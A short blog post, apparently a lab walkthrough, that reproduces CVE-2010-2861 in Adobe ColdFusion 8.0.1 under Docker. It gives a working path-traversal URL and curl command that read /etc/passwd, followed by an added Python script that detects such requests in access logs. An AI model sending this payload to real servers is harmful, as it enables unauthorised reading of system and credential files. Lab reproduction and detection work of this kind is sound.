CVE-2010-2861 Adobe ColdFusion File Read Vulnerability (Reproduction)

Start a server running Adobe ColdFusion 8.0.1 with the following command:
docker compose up -d

Once it is up, visit http://your-ip:8500/CFIDE/administrator/enter.cfm. An initialization page is shown; enter the password admin to complete the environment initialization.

Read the /etc/passwd file:
Visit the following URL directly:
http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
Command: curl "http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en"
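To spot the request above in web server logs, the following added example (not part of the original post) flags any logged request whose locale parameter contains ../ sequences or a NUL byte after percent-decoding. The function names, the access-log format and the sample log lines are assumptions constructed for illustration, and the check applies to any path, not only enter.cfm.

```python
import re
from urllib.parse import urlsplit, unquote

# Request line of a common/combined-format access-log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")

def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so nested encoding is normalised first."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_locale(log_line):
    """Return the reasons a logged request's locale value looks like a file path."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    reasons = []
    for pair in urlsplit(match.group(1)).query.split("&"):
        key, _, raw = pair.partition("=")
        if unquote(key).lower() != "locale":
            continue
        value = decode_fully(raw)
        if TRAVERSAL_RE.search(value) and "traversal sequence" not in reasons:
            reasons.append("traversal sequence")
        if "\x00" in value and "NUL byte" not in reasons:
            reasons.append("NUL byte")
    return reasons

# Constructed sample log lines (192.0.2.10 is a documentation address).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Aug/2025:10:05:00 +0000] "GET /CFIDE/administrator/enter.cfm'
    '?locale=../../../../../../../../../../etc/passwd%00en HTTP/1.1" 200 1871',
    '192.0.2.10 - - [05/Aug/2025:10:06:00 +0000] "GET /CFIDE/administrator/enter.cfm'
    '?locale=en HTTP/1.1" 200 9120',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_locale(line) or "ok", "<-", line.split('"')[1])
```

A legitimate locale value is a short language tag such as en, so any hit from this check is worth reviewing together with the response size of the same log entry.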

posted @ 2025-08-05 10:05  小小葱油